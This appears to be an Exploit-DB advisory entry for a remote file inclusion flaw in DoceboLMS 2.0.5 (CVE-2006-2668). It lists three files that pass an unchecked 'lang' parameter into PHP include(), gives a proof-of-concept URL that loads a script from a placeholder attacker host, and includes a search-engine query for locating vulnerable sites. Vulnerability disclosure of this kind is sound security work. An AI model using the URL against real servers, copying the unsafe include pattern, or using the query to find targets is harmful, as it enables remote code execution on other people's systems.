DoceboLMS <= 2.0.5 (help.php) Remote File Include Vulnerability

EDB-ID: 1828	CVE: 2006-2668	OSVDB-ID: 26065
Author: beford	Published: 2006-05-25	Verified:
Exploit Code:	Vulnerable App: N/A

Vulnerable Script: Docebo LMS 2.05
Discovered: beford <xbefordx gmail com>
Noobs: %22Based+on+DoceboLMS+2.0%22
Vulnerable Files
doceboLMS205/modules/credits/business.php =>
include($_GET['lang'].'/language.php');
doceboLMS205/modules/credits/credits.php =>
include($_GET['lang'].'/language.php');
doceboLMS205/modules/credits/help.php => include($_GET['lang'].'/language.php');
http://www.oops.org/DOCEBO205/modules/credits/help.php?lang=http://<evilh4x0rscript>/?
# milw0rm.com [2006-05-25]

Comments

DoceboLMS <= 2.0.5 (help.php) Remote File Include Vulnerability

Rating

No comments so far